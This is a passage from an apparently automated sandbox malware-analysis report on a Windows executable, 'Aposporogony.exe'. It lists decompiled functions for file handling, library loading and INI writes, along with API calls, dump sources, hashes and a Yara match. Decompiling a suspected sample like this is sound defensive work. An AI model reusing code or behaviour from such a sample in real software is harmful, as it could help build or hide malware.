                                                                                                                                                                                      				_t5 = E00406752(_t8); // executed
                                                                                                                                                                                      				if(_t5 == 0) {
                                                                                                                                                                                      					return 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                      			}





                                                                                                                                                                                      0x004067ca
                                                                                                                                                                                      0x004067cd
                                                                                                                                                                                      0x004067d4
                                                                                                                                                                                      0x004067dc
                                                                                                                                                                                      0x004067e8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004067ef
                                                                                                                                                                                      0x004067df
                                                                                                                                                                                      0x004067e6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004067f7
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                        • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                        • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                        • Part of subcall function 00406752: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                                                      • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                      • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                                                      			E00405EDE(WCHAR* _a4, long _a8, long _a12) {
                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t5 = GetFileAttributesW(_a4); // executed
                                                                                                                                                                                      				asm("sbb ecx, ecx");
                                                                                                                                                                                      				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                                                                                      				return _t6;
                                                                                                                                                                                      			}





                                                                                                                                                                                      0x00405ee2
                                                                                                                                                                                      0x00405eef
                                                                                                                                                                                      0x00405f04
                                                                                                                                                                                      0x00405f0a

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\Aposporogony.exe,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                      • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                      • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                      • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00405EB9(WCHAR* _a4) {
                                                                                                                                                                                      				signed char _t3;
                                                                                                                                                                                      				signed char _t7;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t3 = GetFileAttributesW(_a4); // executed
                                                                                                                                                                                      				_t7 = _t3;
                                                                                                                                                                                      				if(_t7 != 0xffffffff) {
                                                                                                                                                                                      					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                      			}





                                                                                                                                                                                      0x00405ebe
                                                                                                                                                                                      0x00405ec4
                                                                                                                                                                                      0x00405ec9
                                                                                                                                                                                      0x00405ed2
                                                                                                                                                                                      0x00405ed2
                                                                                                                                                                                      0x00405edb

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405ABE,?,?,00000000,00405C94,?,?,?,?), ref: 00405EBE
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                      • Instruction ID: 9f0be338fa0adf84d9e7c2e76c5bc37ea56a51acd28ddc8ab22a7b028afbcef4
                                                                                                                                                                                      • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13D01272504420AFC2502738EF0C89FBF95DB543717124B35FAE9A22F0CB304C568A98
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E0040599C(WCHAR* _a4) {
                                                                                                                                                                                      				int _t2;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                                                                                                                      				if(_t2 == 0) {
                                                                                                                                                                                      					return GetLastError();
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}




                                                                                                                                                                                      0x004059a2
                                                                                                                                                                                      0x004059aa
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004059b0
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77273420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                      • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                      • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                      • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileA.KERNELBASE(?,11789B69), ref: 034A0F34
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                      • Opcode ID: f092906e00f7a0e8d5eea72231157e32e8a26d312af426c4e4b32e8304fdbe29
                                                                                                                                                                                      • Instruction ID: deab6177c9d99debeaef7865ae496fbaecc3314f380e7b12c09374e054ce3ac6
                                                                                                                                                                                      • Opcode Fuzzy Hash: f092906e00f7a0e8d5eea72231157e32e8a26d312af426c4e4b32e8304fdbe29
                                                                                                                                                                                      • Instruction Fuzzy Hash: AD218CB4514352AFCF24AE689DAE7EB77A5AF25750F82092ECCC6D7145E32084C6CE06
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                      			E0040167B() {
                                                                                                                                                                                      				int _t7;
                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t18 = E00402C41(0xffffffd0);
                                                                                                                                                                                      				_t16 = E00402C41(0xffffffdf);
                                                                                                                                                                                      				E00402C41(0x13);
                                                                                                                                                                                      				_t7 = MoveFileW(_t4, _t5); // executed
                                                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                                                      					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E0040672B(_t18) == 0) {
                                                                                                                                                                                      						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E004061AE(_t15, _t18, _t16);
                                                                                                                                                                                      						_push(0xffffffe4);
                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_push(0xffffffe3);
                                                                                                                                                                                      					L5:
                                                                                                                                                                                      					E00401423();
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t20 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}







                                                                                                                                                                                      0x00401684
                                                                                                                                                                                      0x0040168d
                                                                                                                                                                                      0x0040168f
                                                                                                                                                                                      0x00401696
                                                                                                                                                                                      0x0040169e
                                                                                                                                                                                      0x004016aa
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x004016be
                                                                                                                                                                                      0x004016c0
                                                                                                                                                                                      0x004016c5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004016c5
                                                                                                                                                                                      0x004016a0
                                                                                                                                                                                      0x004016a0
                                                                                                                                                                                      0x0040224b
                                                                                                                                                                                      0x0040224b
                                                                                                                                                                                      0x0040224b
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileMove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3562171763-0
                                                                                                                                                                                      • Opcode ID: 8c339daa3a7b1895c5610270f19c3bfd1a7a1a741751d4ae796853630cd4f37d
                                                                                                                                                                                      • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c339daa3a7b1895c5610270f19c3bfd1a7a1a741751d4ae796853630cd4f37d
                                                                                                                                                                                      • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 33%
                                                                                                                                                                                      			E004027EF(intOrPtr __edx, void* __eflags) {
                                                                                                                                                                                      				long _t8;
                                                                                                                                                                                      				long _t10;
                                                                                                                                                                                      				LONG* _t12;
                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                      				intOrPtr _t15;
                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t15 = __edx;
                                                                                                                                                                                      				_push(ds);
                                                                                                                                                                                      				if(__eflags != 0) {
                                                                                                                                                                                      					_t8 = E00402C1F(2);
                                                                                                                                                                                      					_pop(_t14);
                                                                                                                                                                                      					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
                                                                                                                                                                                      					_t10 = SetFilePointer(E00406348(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
                                                                                                                                                                                      					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
                                                                                                                                                                                      						_push(_t10);
                                                                                                                                                                                      						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                                                                                                                                                      						E0040632F();
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t19 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}










                                                                                                                                                                                      0x004027ef
                                                                                                                                                                                      0x004027ef
                                                                                                                                                                                      0x004027f0
                                                                                                                                                                                      0x004027f8
                                                                                                                                                                                      0x004027fd
                                                                                                                                                                                      0x004027fe
                                                                                                                                                                                      0x0040280d
                                                                                                                                                                                      0x00402816
                                                                                                                                                                                      0x00402a67
                                                                                                                                                                                      0x00402a68
                                                                                                                                                                                      0x00402a6b
                                                                                                                                                                                      0x00402a6b
                                                                                                                                                                                      0x00402816
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FilePointerwsprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 327478801-0
                                                                                                                                                                                      • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                                                                                      • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                                                                                                      • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E0040230C(int __eax, WCHAR* __ebx) {
                                                                                                                                                                                      				WCHAR* _t11;
                                                                                                                                                                                      				WCHAR* _t13;
                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t11 = __ebx;
                                                                                                                                                                                      				_t5 = __eax;
                                                                                                                                                                                      				_t13 = 0;
                                                                                                                                                                                      				if(__eax != __ebx) {
                                                                                                                                                                                      					__eax = E00402C41(__ebx);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
                                                                                                                                                                                      					_t13 = E00402C41(0x11);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
                                                                                                                                                                                      					_t11 = E00402C41(0x22);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C41(0xffffffcd)); // executed
                                                                                                                                                                                      				_t21 = _t5;
                                                                                                                                                                                      				if(_t21 == 0) {
                                                                                                                                                                                      					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t17 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}







                                                                                                                                                                                      0x0040230c
                                                                                                                                                                                      0x0040230c
                                                                                                                                                                                      0x0040230e
